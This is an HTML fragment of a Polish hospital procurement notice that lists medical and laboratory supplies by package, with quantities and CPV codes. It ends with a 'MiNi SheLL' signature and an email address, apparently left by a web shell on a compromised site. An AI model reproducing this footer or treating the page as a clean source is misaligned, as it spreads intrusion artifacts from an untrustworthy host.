<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 	5	UKŁADY ODDECHOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Obwód oddechowy pacjenta do aparatu do znieczulenia, kompresyjny,  jednorazowy,długość rur 120 do 150 cm z łącznikiem i kolankiem, trzecia rura ( 80 - 100 cm ) z workiem oddechowym 3 l. ( bez lateksu ) 			100	zest..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.11.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 	6	CEWNIKI  DONOSOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cewniki donosowe do oddechu wspomaganego noworodka w systemie nCPAP (sterylne), ramie cewnika z dwoma krótkimi odprowadzniami do przewodów nosowych oraz zawierające 1 osobne odprowadzenia do respiratora ( wdech i wydech ), miękkie anatomiczne wygiecie końcówek donosowych, ułatwiajacych dopasowanie , minimalizujące odlezyny i martwicę przegrody nosowej, adaptery do układu oddechowego róznego typu respiratorów, rozmiar ponizej 1000 g 			60	szt.
2.	Cewniki donosowe do oddechu wspomaganego noworodka w systemie nCPAP (sterylne), ramie cewnika z dwoma krótkimi odprowadzniami do przewodów nosowych oraz zawierające 1 osobne odprowadzenia do respiratora ( wdech i wydech ), miękkie anatomiczne wygiecie końcówek donosowych, ułatwiajacych dopasowanie , minimalizujące odlezyny i martwicę przegrody nosowej, adaptery do układu oddechowego róznego typu respiratorów, rozmiar  poniżej1500g 			110	szt.
3.	Cewniki donosowe do oddechu wspomaganego noworodka w systemie nCPAP (sterylne), ramie cewnika z dwoma krótkimi odprowadzniami do przewodów nosowych oraz zawierające 1 osobne odprowadzenia do respiratora ( wdech i wydech ), miękkie anatomiczne wygiecie końcówek donosowych, ułatwiajacych dopasowanie , minimalizujące odlezyny i martwicę przegrody nosowej, adaptery do układu oddechowego róznego typu respiratorów, rozmiar powyżej 1500 g			80	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.78.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 	7	Łączniki do drenów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Łącznik do drenów o konstrukcji schodkowej zabezpieczający przed rozłanczaniem niesterylny średnica łącznika 6-8-10-12-15-12-10-8-6 lub 6-8-10-12-10-8-6			80	szt. 
2.	Adapter łączący cewnik do odsysania z drenem do ssaka, typu Kapkon z kontrolom ssania 			40	szt. 
3.	Trójnik do drenów typu T lub Y o różnej średnicy - średnica 6-7 mm długość ramion min. 5 cm			60	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.42.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 	8	KANIULA DO PŁUKANIA RAN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Kaniula do płukania ran prosta lub zagięta wielokrotnego użytku rozmiar 1,2 x 80 mm			8	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet Nr 	9	ELEKTRODA  DO  APARATU  IFA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Elektroda silikonowa  do aparatu  elektroterapeutycznego  IFA 3  
rozmiar 6 x 12 cm, 12 x 6 cm.			6	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.82.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 	10	ZESTAWY DO TERMOABLACJI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw do termoablacji, jednorazowy, sterylny typu Therma Choice ( kateter z balonem do termoablacji )			3	zest..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet Nr 	11	FARTUCHY Z FOLII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Fartuchy z folii niesterylne			1 500	szt
2	Fartuchy z folii z długim rękawem			50	szt
3	Fartuchy wykonane z grubszej folii			100	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet Nr 	12	CEWNIK UROLOGICZNY ZEWNĘTRZNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cewnik urologiczny zewnętrzny z hydrokoloidowym przylepcem rozmiar 32 mm			10	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet Nr 	13	KAPILARY DO GAZOMETRII SZKLANE DO APARATU COBAS 6121 OMNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kapilara do gazometri o objętości 1,5 mikrolitrów i długości 100 mm , heparynizowane - 6 jU heparyny sodowej , 9 jU heparyny litowej / 100 mikrolitrów			10 000	szt.
2.	Oddzielacz skrzeplin zawierajacy filtr siatkowy zabezpieczajacy przedostawaniiu się skrzeplin do analizatora			10 000	szt.
3.	Zatyczki do kapilar do gazometrii o pojemności 100 mikrolitrów 			10 000	szt.
4.	Mieszadełko do kapilar do gazometrii o pojemności 100 mikrolitrów 			5 000	szt.
5.	Magnes do kapilar 			100	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet Nr 	14	SZKIEŁKA PODSTAWOWE I NAKRYWKOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szkiełka nakrywkowe rozmiar 24 x24			23 000	szt.
2.	Szkiełka nakrywkowe rozmiar 24 x 60 grubość 0,13 - 0,17 mm			46 000	szt.
3.	Szkiełka podstawowe z cietymi krawędziami gładkie rozmiar 76 x 26 mm, grubość od 1,80 do 2,00 mm			1 600	szt.
4.	Szkełka podstawowe z szlifowanymi krawędziami pod kątem 45 stopni gładkie rozmiar 76 x 26 mm, grubość od 1,00 do 1,35 mm			2 000	szt.
5.	Szkiełka podstawowe matowione z ciętymi krawędziami z polem do opisu 76 x 26 mm			49 000	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet Nr 	15	PŁYTKI PETRIEGO SZKLANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Płytki Petriego szklane o średnicy 100 mm z dokładnie wyprofilowanym dnem, wys. całkowita ok.. 18 mm			500	szt.
2.	Płytki Petriego szklane o średnicy 12 mm z dokładnie wyprofilowanym dnem, wys. całkowita ok. 18 mm			20	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet Nr 	16	KOLBY, ZLEWKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kolba Erlenmajera z wąską szyjką  o poj. 1000 ml			10	szt.
2.	Kolba Erlenmajera z wąską szyjką o poj. 250 - 300 ml			10	szt.
3.	Kolba Erlenmajera z wąską szyjką o poj. 200 ml			6	szt.
4.	Zlewki laboratoryjne, o poj.  od 250 - 300 ml, wysokie			6	szt.
5.	Bagietki szklane z obtopionymi końcami , krótkie .			200	szt.
6	Zlewka laboratoryjna o pojemności 1000 ml			2	szt.
7	Zlewka szklana z wylewem o pojemności 250 ml			10	szt.
8	Zlewka szklana z wylewem o pojemności 300-400 ml			10	szt.
9	Zlewka szklana Erlenmajera z szeroką szyjką o pojemności 250 ml			10	szt.
10	Zlewka szklana o pojemności 50 ml			5	szt.
11	Zlewka szklana o pojemności 25 ml			5	szt.
12	Cylinder miarowy o pojemności 100ml			2	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet Nr 	17	PIPETA PASTEURA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pipeta Pasteura jednorazowego użytku pakowana indywidualnie  sterylna o poj. 3 ml z cienkim końcem			4 500	szt.
2.	Pipeta Pasteura szklana o poj. 3 ml			500	szt.
2.	Pipety wielowymiarowe szklane o pojemności 25 cm 3			2	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet Nr 	18	SZCZOTKI - STATYWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Szczotka do probówek śred. 16 mm			10	szt.
2.	Szczotka do pipet śred. 5 mm			10	szt.
3.	Statyw na 20 probówek śred. 16 mm  /dwudziestomiejscowy/ plastikowy lub druciany, pokryty powłoką z tworzywa sztucznego			10	szt.
4.	Statyw na 20 probówek plastikowy lub druciany pokryty powłoką z tworzywa sztucznego o średnicy 13 mm /dwudziestomiejscowy/			5	szt.
5.	Balonik - smoczek do pipet			30	szt.
6.	Szczotka do mycia kolb			10	szt.
7.	Lejki szklane śr. 150 - 200 mm			5	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet Nr 	19	PROBÓWKI - KUWETY DO FOTOMETRU POINTE 180.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Probówki-kuwety do fotometru POINTE 180			100	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet Nr 	20	ZESTAW DO UTYLIZACJI RTĘCI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw do utylizacji rtęci			2	zest..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet Nr 	21	PISAKI DO EEG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Piórka - pisaki do EEG Micromet 16s			6	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet Nr 	22	SPRZĘT JEDNORAZOWY DO ZABIEGÓW LARYNGOLOGICZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przyrząd do drenażu jamy bembenkowej ucha środkowego, jałowy, typ II, średnica 1,0 do 1,15 mm			20	szt
2.	Rurki wentylacyjne uszne, jałowe, jałowe typ Shah, średnica 1,5 mm- 1 opakowanie a 10 szt			3	op
3.	Płytka silikonowa jałowa, rozmiar 55 x 75 x 1,0 mm			10	szt
4.	Płytka silikonowa jałowa, rozmiar 38 x 50 x 0,13 mm			10	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet Nr 	23	APARATY DO POMP INFUZYJNYCH PRZEPŁYWOWYCH TYPU AMEDA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Aparaty do pomp infuzyjnych przepływowych typu AMEDA			1 100	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet Nr 	24	SONDA BABCOCKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Sonda Babcocka jednorazowa do usuwania żylaków nóg			12	sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet Nr 	25	DROBNY SPRZĘT DO STERYLIZACJI I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Znaczniki narzedzi chirurgicznych odporne na warunki maszynowego mycia , dezynfekcji oraz sterylizacji parowej i formaldehydowej , możliwośc łatwego usunięcia po zużyciu . Jedno opakowanie zawierające 11 - 21 kolorów . Jeden kolor musi posiadac 130 - 180 sztuk znakowań  w tym gładkich i zebra			1	op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet Nr 	26	CZĘŚCI DO ZAMYKANIA BUTELEK Z ROZTWOREM FORMALINY DO STERYLIZATORA TYPU FORMOMAT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Korek gumowy jednorazowy do zamykania butelek z roztworem formaliny średnica 32 mm 			1 000	szt.
2.	Kapsel aluminiowy do kapslownicy sterylizatora typu FORMOMAT			1 000	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet Nr 	27	RURKI TRACHEOSTOMIJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rurka tracheostomijna z regulowanym położeniem kołnierza posiadająca mechanizm blokujący, uniemożliwiający przesuwanie kołnierza wzdłuż osi rurki oraz obracanie o kąt 360 stopni z miękkim cienkościennym mankietem niskociśnieniowym oraz sytemem ograniczania wzrostu ciśnienia wewnątrz mankietu, z balonikiem kontrolnym wyraźnie wskazującym na wypełnienie mankietu (płaski przed wypełnieniem), wykonana z mieszaniny silikonu i PCV, półprzeźroczysta z ozanczeniem rozmiaru rurki.          Rozmiary: 7,0, 8,0; 9,0; 10,0 mm 			5
2	Rurka tracheostomijna, fenestracyjna z miękkim cienkościennym mankietem niskociśnieniowym oraz systemem ograniczania wzrostu ciśnienia wewnątrz mankietu, z balonikiem kontrolnym wyraźnie wskazującym na wypełnienie mankietu (płaski przed wypełnieniem) wykonana z termoplastycznego PCV w całości widoczna w RTG, posiadająca elastyczny, przeźroczysty kołnierz z ozanczeniem rozmiaru i długości rurki oraz sztywny mandrym z otworem na prowadnicę, umożliwiający założenie bąć wymianę rurki, w zestawie z dwoma kaniulami (zwykłą i fenestracyjną), opaską i szczoteczką do czyszczenia                                       Rozmiary: 7,0; 7,5; 8,0; 8,5; 9,0; 10,0			6
3	Rurka tracheostomijna z odsysaniem z przestrzeni podgłośniowej, fenestracyjna z miękkim cienkościennym mankietem niskociśnieniowym oraz systemem ograniczania wzrostu ciśnienia wewnątrz mankietu, z balonikiem kontrolnym wyraźnie wskazującym na wypełnienie mankietu (płaski przed wypełnieniem) wykonana z termoplastycznego PCV , posiadająca elastyczny, przeźroczysty kołnierz z ozanczeniem rozmiaru i długości rurki oraz samoblokujący się mandrym z otworem na prowadnicę, umożliwiający założenie bąć wymianę rurki                                    Rozmiary: 7,0; 7,5; 8,0; 8,5; 9,0; 10,0			6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet Nr 	28	DROBNY SPRZĘT DO STERYLIZACJI II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mata antypoślizgowa , silikonowa , wielorazowego użytku do stabilizacji narzedzi laparoskopowych , długośc 50 - 60 cm , szerokośc 30-40 cm , wysokośc 2,5 - 3 cm z możliwością maszynowego mycia , dezynfekcji oraz sterylizacji parowej i formaldehydowej .			1	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet Nr 	29	FILTRY DO ZESAWU LAPAROSKOPOWEGO TYP GIMMI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Filtr do insuflatora hydrofobowy, sterylny, odpowiadający numerowi katalogowemu S.2815.50, op/a-20 szt.			1	op.
2.	Filtr do pompy ssąco/płuczącej odpowiadający numerowi katalogowemu T.5200.40, op.a/50szt			1	op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet Nr 	30	PRZYRZĄDY DO ANESTEZJI I RESUSCYTACJI  I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rurka tracheostomijna z mankietem uszczelniającym od rozm. 7,0 do 10,0 dł od 9,0 do 10,0 cm 			15	szt.
2	Rurka tracheostomijna bez mankietu od rozm. 3,0 do 5,0 dł 3,5 do 4,7 cm			10	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Pakiet Nr 	31	CZAPKI DO MOCOWANIA CEWNIKÓW DONOSOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Czapki umożliwiające umocowanie cewników donosowych do stosowania nCPAP,                            obwód głowy :                                                                17 - 22 cm                                                                      22 - 25 cm                                                                     25- 29 cm                                                                     29- 36 cm  (  po 10 sztuk z każdego rozmiaru ) 			40	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.78.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Pakiet Nr 	32	 IGŁY  DO   PODAWANIA LEKÓW DOSZPIKOWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Igła do podawania leków doszpikowo - aparat automatyczny do iniekcji kostnych u dzieci od 0 - do 6 lat 			10	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.78.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com